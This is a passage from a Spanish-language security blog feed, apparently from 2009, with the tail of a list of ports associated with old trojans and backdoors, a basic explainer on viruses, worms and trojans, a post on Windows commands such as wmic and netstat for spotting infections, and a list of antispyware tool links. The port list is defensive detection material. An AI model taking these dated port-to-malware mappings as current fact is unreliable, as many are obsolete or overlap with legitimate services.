Rux&lt;br /&gt;port 9878 TransScout&lt;br /&gt;port 9989 Ini-Killer&lt;br /&gt;port 9999 The Prayer&lt;br /&gt;port 10000 OpwinTRojan&lt;br /&gt;port 10005 OpwinTRojan&lt;br /&gt;port 10067 (UDP) - Portal of Doom&lt;br /&gt;port 10085 Syphillis&lt;br /&gt;port 10086 Syphillis&lt;br /&gt;port 10100 Control Total, Gift trojan&lt;br /&gt;port 10101 BrainSpy, Silencer&lt;br /&gt;port 10167 (UDP) - Portal of Doom&lt;br /&gt;port 10520 Acid Shivers&lt;br /&gt;port 10528 Host Control&lt;br /&gt;port 10607 Coma&lt;br /&gt;port 10666 (UDP) - Ambush&lt;br /&gt;port 11000 Senna Spy Trojan Generator&lt;br /&gt;port 11050 Host Control&lt;br /&gt;port 11051 Host Control&lt;br /&gt;port 11223 Progenic trojan, Secret Agent&lt;br /&gt;port 12076 Gjamer&lt;br /&gt;port 12223 Hack´99 KeyLogger&lt;br /&gt;port 12345 Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c, icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whack Job, X-bill&lt;br /&gt;&lt;br /&gt;port 12346 Fat Bitch trojan, GabanBus, NetBus, X-bill&lt;br /&gt;port 12349 BioNet&lt;br /&gt;port 12361 Whack-a-mole&lt;br /&gt;port 12362 Whack-a-mole&lt;br /&gt;port 12363 Whack-a-mole&lt;br /&gt;port 12623 (UDP) - DUN Control&lt;br /&gt;port 12624 ButtMan&lt;br /&gt;port 12631 Whack Job&lt;br /&gt;port 12754 Mstream&lt;br /&gt;port 13000 Senna Spy Trojan Generator, Senna Spy Trojan Generator&lt;br /&gt;port 13010 Hacker Brasil - HBR&lt;br /&gt;port 13013 PsychWard&lt;br /&gt;port 13014 PsychWard&lt;br /&gt;port 13223 Hack´99 KeyLogger&lt;br /&gt;port 13473 Chupacabra&lt;br /&gt;port 14500 PC Invader&lt;br /&gt;port 14501 PC Invader&lt;br /&gt;port 14502 PC Invader&lt;br /&gt;port 14503 PC Invader&lt;br /&gt;port 15000 NetDemon&lt;br /&gt;port 15092 Host Control&lt;br /&gt;port 15104 Mstream&lt;br /&gt;port 15382 SubZero&lt;br /&gt;port 15858 CDK&lt;br /&gt;port 16484 Mosucker&lt;br /&gt;port 16660 Stacheldraht&lt;br /&gt;port 16772 ICQ Revenge&lt;br /&gt;port 16959 SubSeven, Subseven 2.1.4 DefCon 8&lt;br /&gt;port 16969 Priority&lt;br /&gt;port 17166 Mosaic&lt;br /&gt;port 17300 Kuang2 the virus&lt;br /&gt;port 17449 Kid Terror&lt;br /&gt;port 17499 CrazzyNet&lt;br /&gt;port 17500 CrazzyNet&lt;br /&gt;port 17569 Infector&lt;br /&gt;port 17593 Audiodoor&lt;br /&gt;port 17777 Nephron&lt;br /&gt;port 18753 (UDP) - Shaft&lt;br /&gt;port 19864 ICQ Revenge&lt;br /&gt;port 20000 Millenium&lt;br /&gt;port 20001 Millenium, Millenium (Lm)&lt;br /&gt;port 20002 AcidkoR&lt;br /&gt;port 20005 Mosucker&lt;br /&gt;port 20023 VP Killer&lt;br /&gt;port 20034 NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job&lt;br /&gt;port 20203 Chupacabra&lt;br /&gt;port 20331 BLA trojan&lt;br /&gt;port 20432 Shaft&lt;br /&gt;port 20433 (UDP) - Shaft&lt;br /&gt;port 21544 GirlFriend, Kid Terror&lt;br /&gt;port 21554 Exploiter, Kid Terror, Schwindler, Winsp00fer&lt;br /&gt;port 22222 Donald Dick, Prosiak, Ruler, RUX The TIc.K&lt;br /&gt;port 23005 NetTrash&lt;br /&gt;port 23006 NetTrash&lt;br /&gt;port 23023 Logged&lt;br /&gt;port 23032 Amanda&lt;br /&gt;port 23432 Asylum&lt;br /&gt;port 23456 Evil FTP, Ugly FTP, Whack Job&lt;br /&gt;port 23476 Donald Dick&lt;br /&gt;port 23476 (UDP) - Donald Dick&lt;br /&gt;port 23477 Donald Dick&lt;br /&gt;port 23777 InetSpy&lt;br /&gt;port 24000 Infector&lt;br /&gt;port 25685 Moonpie&lt;br /&gt;port 25686 Moonpie&lt;br /&gt;port 25982 Moonpie&lt;br /&gt;port 26274 (UDP) - Delta Source&lt;br /&gt;port 26681 Voice Spy&lt;br /&gt;port 27374 Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven 2.1.4 DefCon 8, SubSeven Muie, Ttfloader&lt;br /&gt;port 27444 (UDP) - Trinoo&lt;br /&gt;port 27573 SubSeven&lt;br /&gt;port 27665 Trinoo&lt;br /&gt;port 28678 Exploiter&lt;br /&gt;port 29104 NetTrojan&lt;br /&gt;port 29369 ovasOn&lt;br /&gt;port 29891 The Unexplained&lt;br /&gt;port 30000 Infector&lt;br /&gt;port 30001 ErrOr32&lt;br /&gt;port 30003 Lamers Death&lt;br /&gt;port 30029 AOL trojan&lt;br /&gt;port 30100 NetSphere&lt;br /&gt;port 30101 NetSphere&lt;br /&gt;port 30102 NetSphere&lt;br /&gt;port 30103 NetSphere&lt;br /&gt;port 30103 (UDP) - NetSphere&lt;br /&gt;port 30133 NetSphere&lt;br /&gt;port 30303 Sockets des Troie&lt;br /&gt;port 30947 Intruse&lt;br /&gt;port 30999 Kuang2&lt;br /&gt;port 31335 Trinoo&lt;br /&gt;port 31336 Bo Whack, Butt Funnel&lt;br /&gt;port 31337 Back Fire, BackOrifice 1.20 patches, BackOrifice (Lm), BackOrifice russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab, Freak88, Freak2k, icmp_pipe.c, Sockdmini&lt;br /&gt;&lt;br /&gt;port 31337 (UDP) - BackOrifice, Deep BO&lt;br /&gt;port 31338 Back Orifice, Butt Funnel, NetSpy (DK)&lt;br /&gt;port 31338 (UDP) - Deep BO&lt;br /&gt;port 31339 NetSpy (DK)&lt;br /&gt;port 31666 BOWhack&lt;br /&gt;port 31785 Hack´a´Tack&lt;br /&gt;port 31787 Hack´a´Tack&lt;br /&gt;port 31788 Hack´a´Tack&lt;br /&gt;port 31789 (UDP) - Hack´a´Tack&lt;br /&gt;port 31790 Hack´a´Tack&lt;br /&gt;port 31791 (UDP) - Hack´a´Tack&lt;br /&gt;port 31792 Hack´a´Tack&lt;br /&gt;port 32001 Donald Dick&lt;br /&gt;port 32100 Peanut Brittle, Project nEXT&lt;br /&gt;port 32418 Acid Battery&lt;br /&gt;port 33270 Trinity&lt;br /&gt;port 33333 Blakharaz, Prosiak&lt;br /&gt;port 33577 Son of PsychWard&lt;br /&gt;port 33777 Son of PsychWard&lt;br /&gt;port 33911 Spirit 2000, Spirit 2001&lt;br /&gt;port 34324 Big Gluck, TN&lt;br /&gt;port 34444 Donald Dick&lt;br /&gt;port 34555 (UDP) - Trinoo (for Windows)&lt;br /&gt;port 35555 (UDP) - Trinoo (for Windows)&lt;br /&gt;port 37237 Mantis&lt;br /&gt;port 37651 Yet Another Trojan - YAT&lt;br /&gt;port 40412 The Spy&lt;br /&gt;port 40421 Agent 40421, Masters Paradise&lt;br /&gt;port 40422 Masters Paradise&lt;br /&gt;port 40423 Masters Paradise&lt;br /&gt;port 40425 Masters Paradise&lt;br /&gt;port 40426 Masters Paradise&lt;br /&gt;port 41337 Storm&lt;br /&gt;port 41666 Remote Boot Tool - RBT, Remote Boot Tool - RBT&lt;br /&gt;port 44444 Prosiak&lt;br /&gt;port 44575 Exploiter&lt;br /&gt;port 47262 (UDP) - Delta Source&lt;br /&gt;port 49301 OnLine KeyLogger&lt;br /&gt;port 50130 Enterprise&lt;br /&gt;port 50505 Sockets des Troie&lt;br /&gt;port 50766 Fore, Schwindler&lt;br /&gt;port 51966 Cafeini&lt;br /&gt;port 52317 Acid Battery 2000&lt;br /&gt;port 53001 Remote Windows Shutdown - RWS&lt;br /&gt;port 54283 SubSeven, SubSeven 2.1 Gold&lt;br /&gt;port 54320 Back Orifice 2000&lt;br /&gt;port 54321 BackOrifice 2000, School Bus&lt;br /&gt;port 55165 File Manager trojan, File Manager trojan, WM Trojan Generator&lt;br /&gt;port 55166 WM Trojan Generator&lt;br /&gt;port 57341 NetRaider&lt;br /&gt;port 58339 Butt Funnel&lt;br /&gt;port 60000 DeepThroat, Foreplay, Sockets des Troie&lt;br /&gt;port 60001 Trinity&lt;br /&gt;port 60068 Xzip 6000068&lt;br /&gt;port 60411 Connection&lt;br /&gt;port 61348 Bunker-Hill&lt;br /&gt;port 61466 TeleCommando&lt;br /&gt;port 61603 Bunker-Hill&lt;br /&gt;port 63485 Bunker-Hill&lt;br /&gt;port 64101 Taskman&lt;br /&gt;port 65000 Devil, Sockets des Troie, Stacheldraht&lt;br /&gt;port 65390 Eclypse&lt;br /&gt;port 65421 Jade&lt;br /&gt;port 65432 The Traitor (= th3tr41t0r)&lt;br /&gt;port 65432 (UDP) - The Traitor (= th3tr41t0r)&lt;br /&gt;port 65534 /sbin/initd&lt;br /&gt;port 65535 RC1 trojan&lt;br /&gt;&lt;br /&gt;A SABER :Con el comando netstat -na sabemos que puertos tenemos abiertos&lt;br /&gt;ESTE COMANDO SE USA EN EL DOS&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-4038930807192939927?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/4038930807192939927/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/puertos-utilizados-por-troyanos.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4038930807192939927'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4038930807192939927'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/puertos-utilizados-por-troyanos.html' title='Puertos utilizados por troyanos'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2202947828051896805</id><published>2009-10-23T23:19:00.000+02:00</published><updated>2009-10-23T23:21:23.439+02:00</updated><title type='text'>Definicion de  los virus, gusanos y troyanos</title><content type='html'>&lt;span style="font-weight:bold;"&gt;¿Qué es un virus?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Un virus es código informático que se adjunta a sí mismo a un programa o archivo para propagarse de un equipo a otro. Infecta a medida que se transmite. Los virus pueden dañar el software, el hardware y los archivos.&lt;br /&gt;&lt;br /&gt;Virus Código escrito con la intención expresa de replicarse. Un virus se adjunta a sí mismo a un programa host y, a continuación, intenta propagarse de un equipo a otro. Puede dañar el hardware, el software o la información.&lt;br /&gt;&lt;br /&gt;Al igual que los virus humanos tienen una gravedad variable, desde el virus Ébola hasta la gripe de 24 horas, los virus informáticos van desde molestias moderadas hasta llegar a ser destructivos. La buena noticia es que un verdadero virus no se difunde sin la intervención humana. Alguien debe compartir un archivo o enviar un mensaje de correo electrónico para propagarlo.&lt;br /&gt;Principio de la páginaPrincipio de la página&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;¿Qué es un gusano?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Un gusano, al igual que un virus, está diseñado para copiarse de un equipo a otro, pero lo hace automáticamente. En primer lugar, toma el control de las características del equipo que permiten transferir archivos o información. Una vez que un gusano esté en su sistema, puede viajar solo. El gran peligro de los gusanos es su habilidad para replicarse en grandes números. Por ejemplo, un gusano podría enviar copias de sí mismo a todos los usuarios de su libreta de direcciones de correo electrónico, lo que provoca un efecto dominó de intenso tráfico de red que puede hacer más lentas las redes empresariales e Internet en su totalidad. Cuando se lanzan nuevos gusanos, se propagan muy rápidamente. Bloquean las redes y posiblemente provocan esperas largas (a todos los usuarios) para ver las páginas Web en Internet.&lt;br /&gt;&lt;br /&gt;Gusano Subclase de virus. Por lo general, los gusanos se propagan sin la intervención del usuario y distribuye copias completas (posiblemente modificadas) de sí mismo por las redes. Un gusano puede consumir memoria o ancho de banda de red, lo que puede provocar que un equipo se bloquee.&lt;br /&gt;&lt;br /&gt;Debido a que los gusanos no tienen que viajar mediante un programa o archivo "host", también pueden crear un túnel en el sistema y permitir que otro usuario tome el control del equipo de forma remota. Entre los ejemplos recientes de gusanos se incluyen: Sasser y Blaster.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;¿Qué es un troyano?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Del mismo modo que el caballo de Troya mitológico parecía ser un regalo pero contenía soldados griegos que dominaron la ciudad de Troya, los troyanos de hoy en día son programas informáticos que parecen ser software útil pero que ponen en peligro la seguridad y provocan muchos daños. Un troyano reciente apareció como un mensaje de correo electrónico que incluye archivos adjuntos que aparentaban ser actualizaciones de seguridad de Microsoft, pero que resultaron ser virus que intentaban deshabilitar el software antivirus y de servidor de seguridad.&lt;br /&gt;&lt;br /&gt;Troyano Programa informático que parece ser útil pero que realmente provoca daños.&lt;br /&gt;&lt;br /&gt;Los troyanos se difunden cuando a los usuarios se les engaña para abrir un programa porque creen que procede de un origen legítimo. Para proteger mejor a los usuarios, Microsoft suele enviar boletines de seguridad por correo electrónico, pero nunca contienen archivos adjuntos. También publicamos todas nuestras alertas de seguridad en nuestro sitio Web de seguridad antes de enviarlas por correo electrónico a nuestros clientes.&lt;br /&gt;&lt;br /&gt;Los troyanos también se pueden incluir en software que se descarga gratuitamente. Nunca descargue software de un origen en el que no confíe. Descargue siempre las actualizaciones y revisiones de Microsoft de los sitios Microsoft Windows Update o Microsoft Office Update.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;¿Cómo se transmiten los gusanos y otros virus?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Prácticamente todos los virus y muchos gusanos no se pueden transmitir a menos que se abra o se ejecute un programa infectado.&lt;br /&gt;&lt;br /&gt;Muchos de los virus más peligrosos se difundían principalmente mediante archivos adjuntos de correo electrónico, los archivos que se envían junto con un mensaje de correo electrónico. Normalmente se puede saber que el correo electrónico incluye un archivo adjunto porque se muestra el icono de un clip que representa el archivo adjunto e incluye su nombre. Algunos tipos de archivos que se pueden recibir por correo electrónico habitualmente son fotos, cartas escritas en Microsoft Word e, incluso, hojas de cálculo de Excel. Un virus se inicia al abrir un archivo adjunto infectado (normalmente se hace clic en el icono de archivo adjunto para abrirlo).&lt;br /&gt;Sugerencia&lt;br /&gt;&lt;br /&gt;Sugerencia: nunca abra nada que esté adjunto a un mensaje de correo electrónico a menos que espere el archivo y conozca el contenido exacto de dicho archivo.&lt;br /&gt;&lt;br /&gt;Si recibe un correo electrónico con un archivo adjunto de un desconocido, elimínelo inmediatamente. Por desgracia, en ocasiones tampoco resulta seguro abrir archivos adjuntos de personas que conoce. Los virus y los gusanos tienen la capacidad de robar la información de los programas de correo electrónico y enviarse a todos los incluidos en la libreta de direcciones. Por lo tanto, si recibe un correo electrónico de alguien con un mensaje que no entiende o un archivo que no esperaba, póngase siempre en contacto con la persona y confirme el contenido del archivo adjunto antes de abrirlo.&lt;br /&gt;&lt;br /&gt;Otros virus se pueden propagar mediante programas que se descargan de Internet o de discos repletos de virus que dejan los amigos o incluso que se compran en una tienda. Existen formas menos habituales de contraer un virus. La mayoría de las personas se contagian de virus si abren y ejecutan archivos adjuntos de correo electrónico desconocidos.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt;¿Cómo puedo saber si tengo un gusano u otro virus?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Al abrir y ejecutar un programa infectado, es posible que no sepa que ha contraído un virus. Su equipo puede hacerse más lento o bloquearse y reiniciarse cada pocos minutos. En ocasiones, un virus ataca los archivos que necesita para iniciar un equipo. En este caso, puede presionar el botón de encendido y estar mirando una pantalla vacía.&lt;br /&gt;&lt;br /&gt;Todos estos síntomas son signos habituales de que el equipo tiene un virus, aunque se pueden deber a problemas de hardware o software que nada tengan que ver con un virus.&lt;br /&gt;&lt;br /&gt;Preste atención a los mensajes que indiquen que ha enviado correo electrónico con virus. Puede significar que el virus ha incluido su dirección de correo como el remitente de un correo electrónico infectado. Esto no significa necesariamente que tenga un virus. Algunos virus tienen la capacidad de falsificar las direcciones de correo electrónico.&lt;br /&gt;&lt;br /&gt;A menos que tenga instalado software antivirus actualizado en el equipo, no existe un modo seguro de saber si tiene un virus. Si no dispone de software antivirus actual o si desea instalar otra marca de software antivirus, visite nuestra página de descargas de software de seguridad.&lt;br /&gt;&lt;br /&gt;Fuente:foro.latinohack&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-2202947828051896805?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/2202947828051896805/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/definicion-de-los-virus-gusanos-y.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2202947828051896805'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2202947828051896805'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/definicion-de-los-virus-gusanos-y.html' title='Definicion de  los virus, gusanos y troyanos'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-3260177114804052429</id><published>2009-10-22T16:25:00.000+02:00</published><updated>2009-10-22T16:27:49.867+02:00</updated><title type='text'>5 comandos para detectar ataques en windows</title><content type='html'>Hoy vamos a aprender a examinar una maquina en busca de malware o conexiones no apropiadas de una maquina.&lt;br /&gt;Como muchos sabemos los programas espias , troyanos etc.. utilizan una parte de conexion a internet para mandar datos a su creador o a la persona que nos infecto, hoy vamos a aprender como podemos identificarlos , ya queda en ustedes investigar el nombre del proceso y que tipo de software pueden tener instalado que pueden dañar su integridad , por razones de extencion no vamos a ver que tipos de programas malware existen.&lt;br /&gt;&lt;br /&gt;1) WMIC: Un mundo de aventura espera&lt;br /&gt;Instrumentación de Dirección de Ventanas (WMIC) ; WMIC deja a usuarios administrativos tener acceso a todas las clases de información detallada sobre una máquina en Ventanas, incluyendo los atributos detallados de unos miles de ajustes y objetos. WMIC es construido en D.O.S.&lt;br /&gt;Para usar WMIC, los usuarios deben digitar el comando wmic en el interprete de comandos(D.O:S) el automanticamente lo instalara y estaremos listos para empezar.&lt;br /&gt;     C: \&gt;wmic process&lt;br /&gt;&lt;br /&gt;De seguro saldra un resultado casi no leible, por la razon que no le dimos comandos para organizar la salida de la consulta.&lt;br /&gt;Wmic nos permite organizar la salida de las consultas de forma de lista o full.&lt;br /&gt;Por ejemplo, podemos mirar un resumen(sumario) de cada proceso que corre sobre una máquina :&lt;br /&gt;&lt;br /&gt;    C: \&gt; wmic process list brief&lt;br /&gt;&lt;br /&gt;Mostrará el nombre, ID y prioridad de cada proceso, así como otros atributos interesantes. Para Conseguir aún más detalle, digitamos:&lt;br /&gt;&lt;br /&gt;    C: \&gt; wmic process list full&lt;br /&gt;&lt;br /&gt;Muestra todas las clases de detalles, incluyendo el hilo del ejecutable asociado con el proceso y su invocación de línea de mando. Si Investigamos una máquina por una infección, un administrador debería mirar cada proceso para determinar si tiene procesos legítimos sobre la máquina.&lt;br /&gt;Más allá de mirar el l alias de un proceso, los usuarios podrían incluir en el arranque un proceso determiando, para conseguir una lista de todos los programas de inicio sobre una máquina utilizaremos el siguiente comando:&lt;br /&gt;&lt;br /&gt;    C: \&gt; wmic startup list full&lt;br /&gt;&lt;br /&gt;Mucho malware automáticamente utiiliza el autoinicio añadiendo una entrada de autorun junto a los procesos legítimos que pueden pertenecer antivirus y varios programas de bandeja de sistema.&lt;br /&gt;Una opción práctica dentro de WMIC es la capacidad de controlar un mando de la información creciente en una base repetida por usando la sintaxis " / cada: [N] " .[La N] es un número entero, indicando que WMIC debera controlar la orden dado cada [N] segundos. Así, los usuarios pueden buscar cambios de los ajustes del sistema con el tiempo. Usando esta función para tirar un resumen(sumario) de proceso cada 5 segundos, usuarios podrían correr:&lt;br /&gt;&lt;br /&gt;    C: \&gt; wmic process list brief /every:1&lt;br /&gt;&lt;br /&gt;CTRL+C para parrar el ciclo.&lt;br /&gt;2) El comando net:&lt;br /&gt;&lt;br /&gt;Los administradores pueden usar esto para mostrar todas las clases de información útil.&lt;br /&gt;Por ejemplo, " net user" muestra todas las cuentas de usuario definidas sobre la máquina. " net localgroup " muestra los grupos, " net localgroup administrators" muestra los usuarios del grupo de administradores " net start " muestra los servicios que estan corriendo.&lt;br /&gt;Los atacantes con frecuencia añaden a usuarios a un sistema o ponen sus propias cuentas en los grupos de administradores, entonces esto es siempre una idea buena de comprobar la salida de estas órdenes para ver si un atacante ha manipulado las cuentas sobre una máquina. También, algunos atacantes crean sus propios servicios en una máquina.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3) Openfiles:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como su nombre implica, este mando muestra todos los archivos que son abiertos sobre windows, indicando el nombre de proceso que actúa recíprocamente con cada archivo,esto mostrará todos los archivos abiertos , dando el nombre de proceso y el camino de cada archivo.&lt;br /&gt;&lt;br /&gt;Por la cantidad de datos que nos arrojan las estadisticas debemos fltrar la salida de informacion&lt;br /&gt;&lt;br /&gt;    C: \&gt; openfiles /local on&lt;br /&gt;&lt;br /&gt;    C: \&gt; openfiles /query /v&lt;br /&gt;&lt;br /&gt;Este mando mostrará la salida verbosa, que incluye la cuenta de usuario y cada proceso abierto activo. Cuando terminado con el mando de openfiles, puede ser cerrada y el sistema vuelve a sul funcionamiento normal :&lt;br /&gt;&lt;br /&gt;    C: \&gt; openfiles /local off&lt;br /&gt;&lt;br /&gt;4) Netstat: Muéstra la red&lt;br /&gt;&lt;br /&gt;este comando muestran la actividad de red, enfocando TCP y UDP por defecto. Como los malware a menudo se comunica a través de la red, los usuarios pueden buscar conexiones desconocidas en la salida de netstat, para esto ejecutamos así:&lt;br /&gt;&lt;br /&gt;    C: \&gt; netstat -nao&lt;br /&gt;&lt;br /&gt;La opción-n dice a netstat que muestre números en su salida, no los nombres de máquinas y protocolos, y en cambio muestra direcciones de IP Y TCP o números de puerto de UDP. El-a indica que muestre todas las conexiones y puertos de escucha. La opción-o dice a netstat mostrar el número de processID de cada programa que actúa recíprocamente con el puerto de UDP O UN TCP. Si, en vez de TCP Y UDP, usted está interesado en ICMP, netstat tambien lo puede hacer:&lt;br /&gt;&lt;br /&gt;    C: \&gt; netstat-s-p icmp&lt;br /&gt;&lt;br /&gt;Esto devolverá la estadística (-s) del protocolo ICMP. Aunque no tan detallado como el TCP y UDP, los usuarios puedan ver si una máquina envía el tráfico frecuente e inesperado ICMP sobre la red. Algunas puertas traseras y otro malware comunican la utilización de la carga útil de mensajes de Eco de ICMP.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como WMIC, el comando netstat también nos deja controlarlo cada N segundos. Pero, en vez de usar la sintaxis WMIC " de / cada: [N] ", los usuarios simplemente siguen su invocación netstat con un espacio y un número entero. Así, para catalogar el TCP y puertos UDP en el empleo sobre una máquina cada 2 segundos, usuarios pueden correr:&lt;br /&gt;&lt;br /&gt;    C: \&gt; netstat-na 2&lt;br /&gt;&lt;br /&gt;5) Find:: Busqueda&lt;br /&gt;&lt;br /&gt;La mayor parte de las órdenes de las que he hablado hasta ahora dan mucha informacion de salida , que podría ser difícil o maluca la examinacion para una persona encontrar un artículo específico.&lt;br /&gt;Invocado con el mando /c, contará el número de las líneas de su salida que incluyen un valor dado. Los usuarios a menudo quieren contar el número de líneas en la salida de un mando, determinar cuántos procesos controlan, cuantos procesos de arranque están presentes. Para contar las líneas de salida, los usuarios podrían simplemente hacerlo con /c/v " ". Este mando contará (/c) el número de las líneas que no tienen (/v) una línea en blanco (" ") en ellos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Por ejemplo, para mirar información cada segundo sobre procesos que corren sobre de cmd.exe :&lt;br /&gt;&lt;br /&gt;    C: \&gt; wmic process list brief /every:1 | find "cmd.exe"&lt;br /&gt;&lt;br /&gt;O, para ver que procesos autoinician, son asociados con el registro HKLM :&lt;br /&gt;&lt;br /&gt;    C: \&gt; wmic startup list brief | find /i "hklm"&lt;br /&gt;&lt;br /&gt;Contar el número de archivos que se abren sobre una máquina sobre la cual openfiles es activada:&lt;br /&gt;&lt;br /&gt;    C: \&gt; openfiles /query /v | find /c /v ""&lt;br /&gt;&lt;br /&gt;RESUMEN:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Con estos cinco instrumentos, los usuarios pueden conseguir mucha información sobre la configuración y el estado de seguridad de una máquina por medio de Ventanas(D.O.S) en busca de denticar un compromiso o ataque, sin embargo, un usuario tiene que comparar los ajustes que corren en la maquina examinada con una máquina "normal", no infectada.&lt;br /&gt;&lt;br /&gt;fuente: http://bad-robot.blogspot.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-3260177114804052429?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/3260177114804052429/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/5-comandos-para-detectar-ataques-en.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3260177114804052429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3260177114804052429'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/5-comandos-para-detectar-ataques-en.html' title='5 comandos para detectar ataques en windows'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-2976334647255450569</id><published>2009-10-21T14:41:00.000+02:00</published><updated>2009-10-21T15:05:21.066+02:00</updated><title type='text'>HERRAMIENTAS DE SEGURIDAD</title><content type='html'>HERRAMIENTAS ANTISPYWARE:&lt;br /&gt;&lt;br /&gt;      &lt;a href="http://www.emsisoft.com/en/software/download/"&gt;a-squared&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.adaware.es/"&gt;Adaware&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://free.antivirus.com/cwshredder/"&gt;CWShredder&lt;/a&gt;&lt;br /&gt;     &lt;a href="http://www.simplytech.it/ETRemover/"&gt; ETremover - EliteToolbar Remover V.2.1.2&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.avg.com/es-es/download-trial"&gt;Ewido&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://free.antivirus.com/hijackthis/"&gt;HijackThis&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.malwarebytes.org/mbam.php"&gt;Malwarebytes&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.safer-networking.org/es/download/index.htm"&gt;Spybot S &amp; D&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.javacoolsoftware.com/spywareblaster.html"&gt;Spywareblaster&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HERRAMIENTAS PARA LIMPIAR EL REGISTRO:&lt;br /&gt;&lt;br /&gt;     &lt;a href="http://www.321download.com/LastFreeware/"&gt;&lt;br /&gt;      JV16 1.2.0.195 (Freeware)&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://regcleaner.softonic.com/"&gt;RegCleaner&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ANTIVIRUS ON-LINE:&lt;br /&gt;&lt;br /&gt;      &lt;a href="http://www.emsisoft.org/es/software/ax/"&gt;a-squared&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.bitdefender.com/scanner/online/free.html"&gt;BitDefender&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://linkscanner.avg.com/"&gt;Ewido&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.kaspersky.com/virusscanner"&gt;Kaspersky&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://housecall.trendmicro.com/"&gt;TrendMicro&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.pandasecurity.com/activescan/index/"&gt;Panda&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://security.symantec.com/sscv6/WelcomePage.asp"&gt;Symantec&lt;/a&gt;&lt;br /&gt;      &lt;a 